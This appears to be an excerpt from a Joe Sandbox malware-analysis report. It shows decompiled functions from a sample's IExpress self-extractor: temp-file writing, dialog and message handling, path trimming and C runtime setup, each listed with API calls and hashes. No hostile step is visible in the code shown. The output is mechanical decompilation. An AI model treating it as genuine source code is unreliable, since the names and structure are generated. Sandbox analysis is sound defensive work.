                                                                                                                                                                                                                                            			}















                                                                                                                                                                                                                                            0x00a963cb
                                                                                                                                                                                                                                            0x00a963d2
                                                                                                                                                                                                                                            0x00a963d8
                                                                                                                                                                                                                                            0x00a963ea
                                                                                                                                                                                                                                            0x00a963f3
                                                                                                                                                                                                                                            0x00a96401
                                                                                                                                                                                                                                            0x00a96402
                                                                                                                                                                                                                                            0x00a96410
                                                                                                                                                                                                                                            0x00a96415
                                                                                                                                                                                                                                            0x00a96433
                                                                                                                                                                                                                                            0x00a96438
                                                                                                                                                                                                                                            0x00a96449
                                                                                                                                                                                                                                            0x00a96463
                                                                                                                                                                                                                                            0x00a9646d
                                                                                                                                                                                                                                            0x00a96477
                                                                                                                                                                                                                                            0x00a96477
                                                                                                                                                                                                                                            0x00a9647a
                                                                                                                                                                                                                                            0x00a9643a
                                                                                                                                                                                                                                            0x00a9643a
                                                                                                                                                                                                                                            0x00a96444
                                                                                                                                                                                                                                            0x00a96444
                                                                                                                                                                                                                                            0x00a96492

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\), ref: 00A9642D
                                                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,?,?,00000000,00000000,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\), ref: 00A9645B
                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\), ref: 00A9647A
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            • C:\Users\user\AppData\Local\Temp\IXP002.TMP\, xrefs: 00A963EB
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.408348267.0000000000A91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408340639.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408358969.0000000000A98000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_a90000_faC80kI.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: File$CloseCreateHandleWrite
                                                                                                                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\
                                                                                                                                                                                                                                            • API String ID: 1065093856-1610346413
                                                                                                                                                                                                                                            • Opcode ID: 8a3deda819ab6c744169314b510237268fa445c138c8e15ffab3ffff644cc3fd
                                                                                                                                                                                                                                            • Instruction ID: cf29f51a44b085467e32f3d7baca73cb4cc7207f1ca92b07c52387d595e137b1
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8a3deda819ab6c744169314b510237268fa445c138c8e15ffab3ffff644cc3fd
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6721C671B00118ABDB10DFA5DC85FEB73B8EB99314F10426AB54597140DAB05D858FA4
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                            			E00A947E0(intOrPtr* __ecx) {
                                                                                                                                                                                                                                            				intOrPtr _t6;
                                                                                                                                                                                                                                            				intOrPtr _t9;
                                                                                                                                                                                                                                            				void* _t11;
                                                                                                                                                                                                                                            				void* _t19;
                                                                                                                                                                                                                                            				intOrPtr* _t22;
                                                                                                                                                                                                                                            				void _t24;
                                                                                                                                                                                                                                            				struct HWND__* _t25;
                                                                                                                                                                                                                                            				struct HWND__* _t26;
                                                                                                                                                                                                                                            				void* _t27;
                                                                                                                                                                                                                                            				intOrPtr* _t28;
                                                                                                                                                                                                                                            				intOrPtr* _t33;
                                                                                                                                                                                                                                            				void* _t34;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t33 = __ecx;
                                                                                                                                                                                                                                            				_t34 = LocalAlloc(0x40, 8);
                                                                                                                                                                                                                                            				if(_t34 != 0) {
                                                                                                                                                                                                                                            					_t22 = _t33;
                                                                                                                                                                                                                                            					_t27 = _t22 + 1;
                                                                                                                                                                                                                                            					do {
                                                                                                                                                                                                                                            						_t6 =  *_t22;
                                                                                                                                                                                                                                            						_t22 = _t22 + 1;
                                                                                                                                                                                                                                            					} while (_t6 != 0);
                                                                                                                                                                                                                                            					_t24 = LocalAlloc(0x40, _t22 - _t27 + 1);
                                                                                                                                                                                                                                            					 *_t34 = _t24;
                                                                                                                                                                                                                                            					if(_t24 != 0) {
                                                                                                                                                                                                                                            						_t28 = _t33;
                                                                                                                                                                                                                                            						_t19 = _t28 + 1;
                                                                                                                                                                                                                                            						do {
                                                                                                                                                                                                                                            							_t9 =  *_t28;
                                                                                                                                                                                                                                            							_t28 = _t28 + 1;
                                                                                                                                                                                                                                            						} while (_t9 != 0);
                                                                                                                                                                                                                                            						E00A91680(_t24, _t28 - _t19 + 1, _t33);
                                                                                                                                                                                                                                            						_t11 =  *0xa991e0; // 0x7c8d90
                                                                                                                                                                                                                                            						 *(_t34 + 4) = _t11;
                                                                                                                                                                                                                                            						 *0xa991e0 = _t34;
                                                                                                                                                                                                                                            						return 1;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_t25 =  *0xa98584; // 0x0
                                                                                                                                                                                                                                            					E00A944B9(_t25, 0x4b5, _t8, _t8, 0x10, _t8);
                                                                                                                                                                                                                                            					LocalFree(_t34);
                                                                                                                                                                                                                                            					L2:
                                                                                                                                                                                                                                            					return 0;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t26 =  *0xa98584; // 0x0
                                                                                                                                                                                                                                            				E00A944B9(_t26, 0x4b5, _t5, _t5, 0x10, _t5);
                                                                                                                                                                                                                                            				goto L2;
                                                                                                                                                                                                                                            			}















                                                                                                                                                                                                                                            0x00a947e8
                                                                                                                                                                                                                                            0x00a947f0
                                                                                                                                                                                                                                            0x00a947f4
                                                                                                                                                                                                                                            0x00a9480f
                                                                                                                                                                                                                                            0x00a94811
                                                                                                                                                                                                                                            0x00a94814
                                                                                                                                                                                                                                            0x00a94814
                                                                                                                                                                                                                                            0x00a94816
                                                                                                                                                                                                                                            0x00a94817
                                                                                                                                                                                                                                            0x00a94829
                                                                                                                                                                                                                                            0x00a9482b
                                                                                                                                                                                                                                            0x00a9482f
                                                                                                                                                                                                                                            0x00a9484f
                                                                                                                                                                                                                                            0x00a94852
                                                                                                                                                                                                                                            0x00a94855
                                                                                                                                                                                                                                            0x00a94855
                                                                                                                                                                                                                                            0x00a94857
                                                                                                                                                                                                                                            0x00a94858
                                                                                                                                                                                                                                            0x00a94860
                                                                                                                                                                                                                                            0x00a94865
                                                                                                                                                                                                                                            0x00a9486a
                                                                                                                                                                                                                                            0x00a9486f
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a94876
                                                                                                                                                                                                                                            0x00a94831
                                                                                                                                                                                                                                            0x00a94841
                                                                                                                                                                                                                                            0x00a94847
                                                                                                                                                                                                                                            0x00a9480b
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a9480b
                                                                                                                                                                                                                                            0x00a947f6
                                                                                                                                                                                                                                            0x00a94806
                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,00000008,?,00000000,00A94E6F), ref: 00A947EA
                                                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,?), ref: 00A94823
                                                                                                                                                                                                                                            • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000), ref: 00A94847
                                                                                                                                                                                                                                              • Part of subcall function 00A944B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00A94518
                                                                                                                                                                                                                                              • Part of subcall function 00A944B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00A94554
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            • C:\Users\user\AppData\Local\Temp\IXP002.TMP\, xrefs: 00A94851
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.408348267.0000000000A91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408340639.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408358969.0000000000A98000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_a90000_faC80kI.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Local$Alloc$FreeLoadMessageString
                                                                                                                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\
                                                                                                                                                                                                                                            • API String ID: 359063898-1610346413
                                                                                                                                                                                                                                            • Opcode ID: dd0adf586c342be019ed543e04a75a85895530164614a1461dba7b02bfcb4050
                                                                                                                                                                                                                                            • Instruction ID: f16fc726ee13bcd084f308ae7f9ab3397ebb48c64eda13632b53b19eca2e8ea6
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: dd0adf586c342be019ed543e04a75a85895530164614a1461dba7b02bfcb4050
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5D11C2797046416FDF24DFA49C58F773BAAEBCA300F14C55AEA829B251DE358C078760
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                            			E00A93680(void* __ecx) {
                                                                                                                                                                                                                                            				void* _v8;
                                                                                                                                                                                                                                            				struct tagMSG _v36;
                                                                                                                                                                                                                                            				int _t8;
                                                                                                                                                                                                                                            				struct HWND__* _t16;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_v8 = __ecx;
                                                                                                                                                                                                                                            				_t16 = 0;
                                                                                                                                                                                                                                            				while(1) {
                                                                                                                                                                                                                                            					_t8 = MsgWaitForMultipleObjects(1,  &_v8, 0, 0xffffffff, 0x4ff);
                                                                                                                                                                                                                                            					if(_t8 == 0) {
                                                                                                                                                                                                                                            						break;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					if(PeekMessageA( &_v36, 0, 0, 0, 1) == 0) {
                                                                                                                                                                                                                                            						continue;
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						do {
                                                                                                                                                                                                                                            							if(_v36.message != 0x12) {
                                                                                                                                                                                                                                            								DispatchMessageA( &_v36);
                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                            								_t16 = 1;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							_t8 = PeekMessageA( &_v36, 0, 0, 0, 1);
                                                                                                                                                                                                                                            						} while (_t8 != 0);
                                                                                                                                                                                                                                            						if(_t16 == 0) {
                                                                                                                                                                                                                                            							continue;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					break;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return _t8;
                                                                                                                                                                                                                                            			}







                                                                                                                                                                                                                                            0x00a9368c
                                                                                                                                                                                                                                            0x00a9368f
                                                                                                                                                                                                                                            0x00a93691
                                                                                                                                                                                                                                            0x00a9369f
                                                                                                                                                                                                                                            0x00a936a7
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a936ba
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a936bc
                                                                                                                                                                                                                                            0x00a936bc
                                                                                                                                                                                                                                            0x00a936c0
                                                                                                                                                                                                                                            0x00a936cb
                                                                                                                                                                                                                                            0x00a936c2
                                                                                                                                                                                                                                            0x00a936c4
                                                                                                                                                                                                                                            0x00a936c4
                                                                                                                                                                                                                                            0x00a936da
                                                                                                                                                                                                                                            0x00a936e0
                                                                                                                                                                                                                                            0x00a936e6
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a936e6
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a936ba
                                                                                                                                                                                                                                            0x00a936ed

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 00A9369F
                                                                                                                                                                                                                                            • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00A936B2
                                                                                                                                                                                                                                            • DispatchMessageA.USER32(?), ref: 00A936CB
                                                                                                                                                                                                                                            • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00A936DA
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.408348267.0000000000A91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408340639.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408358969.0000000000A98000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_a90000_faC80kI.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Message$Peek$DispatchMultipleObjectsWait
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2776232527-0
                                                                                                                                                                                                                                            • Opcode ID: 6636c9ec1773a1210f0576370f744e55f44e9cce52a023d82cfe7545a753e948
                                                                                                                                                                                                                                            • Instruction ID: c0d51a56f3d1165de9dea7f1c77a8c37039630edeef9f7ea3022a3fab9db44f7
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6636c9ec1773a1210f0576370f744e55f44e9cce52a023d82cfe7545a753e948
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 84016773B0025577DF308BE65C48EEB76BCEBC5B10F14021BFA15E2184D965CA45C6A1
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 77%
                                                                                                                                                                                                                                            			E00A96517(void* __ecx, CHAR* __edx, struct HWND__* _a4, _Unknown_base(*)()* _a8, intOrPtr _a12, int _a16) {
                                                                                                                                                                                                                                            				struct HRSRC__* _t6;
                                                                                                                                                                                                                                            				void* _t21;
                                                                                                                                                                                                                                            				struct HINSTANCE__* _t23;
                                                                                                                                                                                                                                            				int _t24;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t23 =  *0xa99a3c; // 0xa90000
                                                                                                                                                                                                                                            				_t6 = FindResourceA(_t23, __edx, 5);
                                                                                                                                                                                                                                            				if(_t6 == 0) {
                                                                                                                                                                                                                                            					L6:
                                                                                                                                                                                                                                            					E00A944B9(0, 0x4fb, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            					_t24 = _a16;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					_t21 = LoadResource(_t23, _t6);
                                                                                                                                                                                                                                            					if(_t21 == 0) {
                                                                                                                                                                                                                                            						goto L6;
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						if(_a12 != 0) {
                                                                                                                                                                                                                                            							_push(_a12);
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							_push(0);
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t24 = DialogBoxIndirectParamA(_t23, _t21, _a4, _a8);
                                                                                                                                                                                                                                            						FreeResource(_t21);
                                                                                                                                                                                                                                            						if(_t24 == 0xffffffff) {
                                                                                                                                                                                                                                            							goto L6;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return _t24;
                                                                                                                                                                                                                                            			}







                                                                                                                                                                                                                                            0x00a9651f
                                                                                                                                                                                                                                            0x00a9652a
                                                                                                                                                                                                                                            0x00a96534
                                                                                                                                                                                                                                            0x00a9656b
                                                                                                                                                                                                                                            0x00a96577
                                                                                                                                                                                                                                            0x00a9657c
                                                                                                                                                                                                                                            0x00a96536
                                                                                                                                                                                                                                            0x00a9653e
                                                                                                                                                                                                                                            0x00a96542
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a96544
                                                                                                                                                                                                                                            0x00a96547
                                                                                                                                                                                                                                            0x00a9654c
                                                                                                                                                                                                                                            0x00a96549
                                                                                                                                                                                                                                            0x00a96549
                                                                                                                                                                                                                                            0x00a96549
                                                                                                                                                                                                                                            0x00a9655e
                                                                                                                                                                                                                                            0x00a96560
                                                                                                                                                                                                                                            0x00a96569
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a96569
                                                                                                                                                                                                                                            0x00a96542
                                                                                                                                                                                                                                            0x00a96587

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • FindResourceA.KERNEL32(00A90000,000007D6,00000005), ref: 00A9652A
                                                                                                                                                                                                                                            • LoadResource.KERNEL32(00A90000,00000000,?,?,00A92EE8,00000000,00A919E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00A96538
                                                                                                                                                                                                                                            • DialogBoxIndirectParamA.USER32(00A90000,00000000,00000547,00A919E0,00000000), ref: 00A96557
                                                                                                                                                                                                                                            • FreeResource.KERNEL32(00000000,?,?,00A92EE8,00000000,00A919E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00A96560
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.408348267.0000000000A91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408340639.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408358969.0000000000A98000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_a90000_faC80kI.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Resource$DialogFindFreeIndirectLoadParam
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 1214682469-0
                                                                                                                                                                                                                                            • Opcode ID: 0754cea9740faaf09ce33f759f747d677b9ad152d80291e02e966461d2f17d72
                                                                                                                                                                                                                                            • Instruction ID: 7fff8f9e40d0fe7e8298db93c2ab598f2212b00034e5a06050db7e4b98d57819
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0754cea9740faaf09ce33f759f747d677b9ad152d80291e02e966461d2f17d72
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9A012672300615BBCF109FA99C08DBB7AACEF89360F01012BFE0093150DB718C1286E1
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 72%
                                                                                                                                                                                                                                            			E00A965E8(char* __ecx) {
                                                                                                                                                                                                                                            				char _t3;
                                                                                                                                                                                                                                            				char _t10;
                                                                                                                                                                                                                                            				char* _t12;
                                                                                                                                                                                                                                            				char* _t14;
                                                                                                                                                                                                                                            				char* _t15;
                                                                                                                                                                                                                                            				CHAR* _t16;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t12 = __ecx;
                                                                                                                                                                                                                                            				_t15 = __ecx;
                                                                                                                                                                                                                                            				_t14 =  &(__ecx[1]);
                                                                                                                                                                                                                                            				_t10 = 0;
                                                                                                                                                                                                                                            				do {
                                                                                                                                                                                                                                            					_t3 =  *_t12;
                                                                                                                                                                                                                                            					_t12 =  &(_t12[1]);
                                                                                                                                                                                                                                            				} while (_t3 != 0);
                                                                                                                                                                                                                                            				_push(CharPrevA(__ecx, _t12 - _t14 + __ecx));
                                                                                                                                                                                                                                            				while(1) {
                                                                                                                                                                                                                                            					_t16 = CharPrevA(_t15, ??);
                                                                                                                                                                                                                                            					if(_t16 <= _t15) {
                                                                                                                                                                                                                                            						break;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					if( *_t16 == 0x5c) {
                                                                                                                                                                                                                                            						L7:
                                                                                                                                                                                                                                            						if(_t16 == _t15 ||  *(CharPrevA(_t15, _t16)) == 0x3a) {
                                                                                                                                                                                                                                            							_t16 = CharNextA(_t16);
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						 *_t16 = _t10;
                                                                                                                                                                                                                                            						_t10 = 1;
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						_push(_t16);
                                                                                                                                                                                                                                            						continue;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					L11:
                                                                                                                                                                                                                                            					return _t10;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				if( *_t16 == 0x5c) {
                                                                                                                                                                                                                                            					goto L7;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				goto L11;
                                                                                                                                                                                                                                            			}









                                                                                                                                                                                                                                            0x00a965e8
                                                                                                                                                                                                                                            0x00a965ed
                                                                                                                                                                                                                                            0x00a965ef
                                                                                                                                                                                                                                            0x00a965f2
                                                                                                                                                                                                                                            0x00a965f4
                                                                                                                                                                                                                                            0x00a965f4
                                                                                                                                                                                                                                            0x00a965f6
                                                                                                                                                                                                                                            0x00a965f7
                                                                                                                                                                                                                                            0x00a96608
                                                                                                                                                                                                                                            0x00a96611
                                                                                                                                                                                                                                            0x00a96618
                                                                                                                                                                                                                                            0x00a9661c
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a9660e
                                                                                                                                                                                                                                            0x00a96623
                                                                                                                                                                                                                                            0x00a96625
                                                                                                                                                                                                                                            0x00a9663b
                                                                                                                                                                                                                                            0x00a9663b
                                                                                                                                                                                                                                            0x00a9663d
                                                                                                                                                                                                                                            0x00a96641
                                                                                                                                                                                                                                            0x00a96610
                                                                                                                                                                                                                                            0x00a96610
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a96610
                                                                                                                                                                                                                                            0x00a96644
                                                                                                                                                                                                                                            0x00a96647
                                                                                                                                                                                                                                            0x00a96647
                                                                                                                                                                                                                                            0x00a96621
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • CharPrevA.USER32(?,00000000,00000000,00000001,00000000,00A92B33), ref: 00A96602
                                                                                                                                                                                                                                            • CharPrevA.USER32(?,00000000), ref: 00A96612
                                                                                                                                                                                                                                            • CharPrevA.USER32(?,00000000), ref: 00A96629
                                                                                                                                                                                                                                            • CharNextA.USER32(00000000), ref: 00A96635
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.408348267.0000000000A91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408340639.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408358969.0000000000A98000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_a90000_faC80kI.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Char$Prev$Next
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3260447230-0
                                                                                                                                                                                                                                            • Opcode ID: 259791afbe62fcad4c9b08c7f7fa43d2e11d73258d3a3d34d601f2859685d3e4
                                                                                                                                                                                                                                            • Instruction ID: 513ee1d8b36cf1e354daf22369da6584cdfe0a062a310d5c4f80e2dc31ca49ff
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 259791afbe62fcad4c9b08c7f7fa43d2e11d73258d3a3d34d601f2859685d3e4
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: ACF028323041906EEF365B698C88DBBBFDCCF9B364B3A02AFE59582001DA150D0786A1
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                            			E00A969B0() {
                                                                                                                                                                                                                                            				intOrPtr* _t4;
                                                                                                                                                                                                                                            				intOrPtr* _t5;
                                                                                                                                                                                                                                            				void* _t6;
                                                                                                                                                                                                                                            				intOrPtr _t11;
                                                                                                                                                                                                                                            				intOrPtr _t12;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				 *0xa981f8 = E00A96C70();
                                                                                                                                                                                                                                            				__set_app_type(E00A96FBE(2));
                                                                                                                                                                                                                                            				 *0xa988a4 =  *0xa988a4 | 0xffffffff;
                                                                                                                                                                                                                                            				 *0xa988a8 =  *0xa988a8 | 0xffffffff;
                                                                                                                                                                                                                                            				_t4 = __p__fmode();
                                                                                                                                                                                                                                            				_t11 =  *0xa98528; // 0x0
                                                                                                                                                                                                                                            				 *_t4 = _t11;
                                                                                                                                                                                                                                            				_t5 = __p__commode();
                                                                                                                                                                                                                                            				_t12 =  *0xa9851c; // 0x0
                                                                                                                                                                                                                                            				 *_t5 = _t12;
                                                                                                                                                                                                                                            				_t6 = E00A97000();
                                                                                                                                                                                                                                            				if( *0xa98000 == 0) {
                                                                                                                                                                                                                                            					__setusermatherr(E00A97000);
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				E00A971EF(_t6);
                                                                                                                                                                                                                                            				return 0;
                                                                                                                                                                                                                                            			}








                                                                                                                                                                                                                                            0x00a969b7
                                                                                                                                                                                                                                            0x00a969c2
                                                                                                                                                                                                                                            0x00a969c8
                                                                                                                                                                                                                                            0x00a969cf
                                                                                                                                                                                                                                            0x00a969d8
                                                                                                                                                                                                                                            0x00a969de
                                                                                                                                                                                                                                            0x00a969e4
                                                                                                                                                                                                                                            0x00a969e6
                                                                                                                                                                                                                                            0x00a969ec
                                                                                                                                                                                                                                            0x00a969f2
                                                                                                                                                                                                                                            0x00a969f4
                                                                                                                                                                                                                                            0x00a96a00
                                                                                                                                                                                                                                            0x00a96a07
                                                                                                                                                                                                                                            0x00a96a0d
                                                                                                                                                                                                                                            0x00a96a0e
                                                                                                                                                                                                                                            0x00a96a15

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 00A96FBE: GetModuleHandleW.KERNEL32(00000000), ref: 00A96FC5
                                                                                                                                                                                                                                            • __set_app_type.MSVCRT ref: 00A969C2
                                                                                                                                                                                                                                            • __p__fmode.MSVCRT ref: 00A969D8
                                                                                                                                                                                                                                            • __p__commode.MSVCRT ref: 00A969E6
                                                                                                                                                                                                                                            • __setusermatherr.MSVCRT ref: 00A96A07
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.408348267.0000000000A91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408340639.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408358969.0000000000A98000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
